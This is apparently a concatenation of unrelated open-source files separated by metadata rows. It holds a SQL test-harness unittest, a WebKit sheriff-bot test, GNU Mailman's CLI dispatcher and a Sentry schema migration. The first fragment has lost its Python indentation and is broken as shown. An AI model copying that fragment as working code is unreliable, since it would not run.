self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
shutil.rmtree(test_case.get_out_dir())
def _check_str_in_file(self, check_string, file_path):
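        """
        Return True if check_string occurs on any line of the file at file_path.
        """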
with open(file_path, 'r') as f:
for line in f:
if check_string in line:
return True
return False
def test_run_sql_test_optimizer_minidump_on_failure(self):
"""
        Test whether we gather minidumps on failures when the test is executed with optimizer on.
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromName('mpp.models.regress.sql_related.regress_sql_test_case.' + \
'regress_sql_test_case.' + \
'MockSQLTestCaseWithOptimizerOn.test_query02')
self.assertIsNotNone(test_suite)
        self.assertEqual(len(test_suite._tests), 1)
test_result = None
test_case = None
for test in test_suite._tests:
test.__class__.__unittest_skip__ = False
test_case = test
if os.path.exists(test_case.get_out_dir()):
shutil.rmtree(test_case.get_out_dir())
with closing(_WritelnDecorator(StringIO())) as buffer:
tinc_test_runner = TINCTestRunner(stream = buffer, descriptions = True, verbosity = 1)
test_result = tinc_test_runner.run(test_suite)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
# Verify that we collect minidump on failure for optimizer execution mode
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_minidump.mdp')))
@unittest.skip("QAINF-999")
def test_run_sql_test_optimizer_minidump_on_failure2(self):
"""
        Test whether we gather minidumps on failures when the test is executed with optimizer_mode both.
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromName('mpp.models.regress.sql_related.regress_sql_test_case.' + \
'regress_sql_test_case.' + \
'MockSQLTestCaseWithOptimizerBoth.test_query02')
self.assertIsNotNone(test_suite)
new_test_suite = tinctest.TINCTestSuite()
self.assertEquals(test_suite.countTestCases(), 2)
test_result = None
test_case = None
for test in test_suite._tests:
if 'test_query02_orca' in test.name:
test.__class__.__unittest_skip__ = False
test_case = test
new_test_suite.addTest(test)
self.assertIsNotNone(test_case)
if os.path.exists(test_case.get_out_dir()):
shutil.rmtree(test_case.get_out_dir())
with closing(_WritelnDecorator(StringIO())) as buffer:
tinc_test_runner = TINCTestRunner(stream = buffer, descriptions = True, verbosity = 1)
test_result = tinc_test_runner.run(new_test_suite)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query02_orca.out')))
# Verify that we collect minidump on failure for optimizer execution mode
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02_minidump.mdp')))
| apache-2.0 | 4,530,284,547,039,419,000 | 45.51871 | 161 | 0.644319 | false |
Observer-Wu/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/sheriff_unittest.py | 122 | 3783 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.common.net.buildbot import Builder
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.bot.sheriff import Sheriff
from webkitpy.tool.mocktool import MockTool
class MockSheriffBot(object):
name = "mock-sheriff-bot"
watchers = [
"[email protected]",
]
def run_webkit_patch(self, args):
return "Created bug https://bugs.webkit.org/show_bug.cgi?id=36936\n"
class SheriffTest(unittest.TestCase):
def test_post_blame_comment_on_bug(self):
def run():
sheriff = Sheriff(MockTool(), MockSheriffBot())
builders = [
Builder("Foo", None),
Builder("Bar", None),
]
commit_info = Mock()
commit_info.bug_id = lambda: None
commit_info.revision = lambda: 4321
# Should do nothing with no bug_id
sheriff.post_blame_comment_on_bug(commit_info, builders, [])
sheriff.post_blame_comment_on_bug(commit_info, builders, ["mock-test-1", "mock-test-2"])
# Should try to post a comment to the bug, but MockTool.bugs does nothing.
commit_info.bug_id = lambda: 1234
sheriff.post_blame_comment_on_bug(commit_info, builders, [])
sheriff.post_blame_comment_on_bug(commit_info, builders, ["mock-test-1"])
sheriff.post_blame_comment_on_bug(commit_info, builders, ["mock-test-1", "mock-test-2"])
expected_logs = u"""MOCK bug comment: bug_id=1234, cc=['[email protected]']
--- Begin comment ---
http://trac.webkit.org/changeset/4321 might have broken Foo and Bar
--- End comment ---
MOCK bug comment: bug_id=1234, cc=['[email protected]']
--- Begin comment ---
http://trac.webkit.org/changeset/4321 might have broken Foo and Bar
The following tests are not passing:
mock-test-1
--- End comment ---
MOCK bug comment: bug_id=1234, cc=['[email protected]']
--- Begin comment ---
http://trac.webkit.org/changeset/4321 might have broken Foo and Bar
The following tests are not passing:
mock-test-1
mock-test-2
--- End comment ---
"""
OutputCapture().assert_outputs(self, run, expected_logs=expected_logs)
| bsd-3-clause | 5,880,873,830,981,891,000 | 41.505618 | 100 | 0.708697 | false |
systers/mailman | src/mailman/bin/mailman.py | 3 | 3848 | # Copyright (C) 2009-2015 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""The 'mailman' command dispatcher."""
__all__ = [
'main',
]
import os
import argparse
from functools import cmp_to_key
from mailman.core.i18n import _
from mailman.core.initialize import initialize
from mailman.interfaces.command import ICLISubCommand
from mailman.utilities.modules import find_components
from mailman.version import MAILMAN_VERSION_FULL
from zope.interface.verify import verifyObject
def main():
"""The `mailman` command dispatcher."""
# Create the basic parser and add all globally common options.
parser = argparse.ArgumentParser(
description=_("""\
The GNU Mailman mailing list management system
Copyright 1998-2015 by the Free Software Foundation, Inc.
http://www.list.org
"""),
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'-v', '--version',
action='version', version=MAILMAN_VERSION_FULL,
help=_('Print this version string and exit'))
parser.add_argument(
'-C', '--config',
help=_("""\
Configuration file to use. If not given, the environment variable
MAILMAN_CONFIG_FILE is consulted and used if set. If neither are
given, a default configuration file is loaded."""))
    # Look at all modules in the mailman.commands package and, if they are prepared
# to add a subcommand, let them do so. I'm still undecided as to whether
# this should be pluggable or not. If so, then we'll probably have to
# partially parse the arguments now, then initialize the system, then find
# the plugins. Punt on this for now.
subparser = parser.add_subparsers(title='Commands')
subcommands = []
for command_class in find_components('mailman.commands', ICLISubCommand):
command = command_class()
verifyObject(ICLISubCommand, command)
subcommands.append(command)
    # --help should display the subcommands in alphabetical order, except that
# 'mailman help' should be first.
def sort_function(command, other):
"""Sorting helper."""
if command.name == 'help':
return -1
elif other.name == 'help':
return 1
elif command.name < other.name:
return -1
elif command.name == other.name:
return 0
else:
assert command.name > other.name
return 1
subcommands.sort(key=cmp_to_key(sort_function))
for command in subcommands:
command_parser = subparser.add_parser(
command.name, help=_(command.__doc__))
command.add(parser, command_parser)
command_parser.set_defaults(func=command.process)
args = parser.parse_args()
if len(args.__dict__) <= 1:
# No arguments or subcommands were given.
parser.print_help()
parser.exit()
# Initialize the system. Honor the -C flag if given.
config_path = (None if args.config is None
else os.path.abspath(os.path.expanduser(args.config)))
initialize(config_path)
# Perform the subcommand option.
args.func(args)
| gpl-3.0 | 6,947,417,399,102,275,000 | 37.09901 | 78 | 0.671778 | false |
beeftornado/sentry | src/sentry/migrations/0066_alertrule_manager.py | 1 | 1754 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-04-15 23:27
from __future__ import unicode_literals
from django.db import migrations
import django.db.models.manager
class Migration(migrations.Migration):
# This flag is used to mark that a migration shouldn't be automatically run in
# production. We set this to True for operations that we think are risky and want
# someone from ops to run manually and monitor.
# General advice is that if in doubt, mark your migration as `is_dangerous`.
# Some things you should always mark as dangerous:
# - Large data migrations. Typically we want these to be run manually by ops so that
# they can be monitored. Since data migrations will now hold a transaction open
# this is even more important.
# - Adding columns to highly active tables, even ones that are NULL.
is_dangerous = False
# This flag is used to decide whether to run this migration in a transaction or not.
# By default we prefer to run in a transaction, but for migrations where you want
# to `CREATE INDEX CONCURRENTLY` this needs to be set to False. Typically you'll
# want to create an index concurrently when adding one to an existing table.
atomic = True
dependencies = [
('sentry', '0065_add_incident_status_method'),
]
operations = [
migrations.AlterModelOptions(
name='alertrule',
options={'base_manager_name': 'objects_with_snapshots', 'default_manager_name': 'objects_with_snapshots'},
),
migrations.AlterModelManagers(
name='alertrule',
managers=[
('objects_with_snapshots', django.db.models.manager.Manager()),
],
),
]
| bsd-3-clause | -6,759,195,421,218,852,000 | 39.790698 | 118 | 0.673318 | false |
llonchj/sentry | src/sentry/migrations/0085_auto__del_unique_project_slug__add_unique_project_slug_team.py | 36 | 23551 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing unique constraint on 'Project', fields ['slug']
db.delete_unique('sentry_project', ['slug'])
# Adding unique constraint on 'Project', fields ['slug', 'team']
db.create_unique('sentry_project', ['slug', 'team_id'])
def backwards(self, orm):
# Removing unique constraint on 'Project', fields ['slug', 'team']
db.delete_unique('sentry_project', ['slug', 'team_id'])
# Adding unique constraint on 'Project', fields ['slug']
db.create_unique('sentry_project', ['slug'])
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.affecteduserbygroup': {
'Meta': {'unique_together': "(('project', 'tuser', 'group'),)", 'object_name': 'AffectedUserByGroup'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'tuser': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.TrackedUser']", 'null': 'True'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'users_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['sentry.User']"})
},
'sentry.trackeduser': {
'Meta': {'unique_together': "(('project', 'ident'),)", 'object_name': 'TrackedUser'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Group']", 'through': "orm['sentry.AffectedUserByGroup']", 'symmetrical': 'False'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
